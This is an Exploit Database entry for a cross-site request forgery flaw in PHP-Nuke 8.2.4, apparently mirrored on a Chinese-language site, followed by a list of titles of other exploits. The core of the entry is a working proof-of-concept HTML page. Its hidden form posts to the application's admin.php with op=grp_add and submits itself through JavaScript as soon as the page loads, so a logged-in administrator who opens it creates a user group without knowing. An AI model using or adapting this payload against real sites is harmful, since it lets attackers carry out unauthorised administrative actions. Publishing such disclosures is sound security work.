PHP-Nuke 8.2.4 – Cross-Site Request Forgery

Exploit Database
88 阅读

作者： sajith

日期： 2012-12-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/23289/

###########################################################
[~] Exploit Title:CSRF vulnerability
[~] Author: sajith
[~] version: PHP Nuke 8.2.4
[~] vulnerable app link:http://phpnuke.org/modules.php?name=Release
###########################################################
 [CSRF add group]

<html lang="en">
<head>
<title>CSRF POC( PHP nuke 8.2.4)</title>
</head>
<body>
<form action="http://127.0.0.1/phpnuke-release-8.2.4/phpnuke/html/admin.php"
id="formid" method="post">
<input type="hidden" name="name" value="testing" />
<input type="hidden" name="description"
value="testing+for+CSRF%3Cbr+%2F%3E" />
<input type="hidden" name="points" value="0" />
<input type="hidden" name="op" value="grp_add" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>

last Exploits
PHP-Nuke 8.2.4 – Cross-Site Request Forgery的更多信息

JBoss JMXInvokerServlet JMXInvoker 0.3 – Remote Command Execution：
Synology DSM 4.3-3827 – ‘article.php’ Blind SQL Injection：
CommodityRentals CD Rental Software – ‘index.php’ SQL Injection：
TestLink 1.19 – Arbitrary File Download (Unauthenticated)：
Global In – Arbitrary File Upload：
Fake Magazine Cover Script – SQL Injection：
E-Sic Software livre CMS – ‘cpfcnpj’ SQL Injection：
Geist WatchDog Console 3.2.2 – Multiple Vulnerabilities：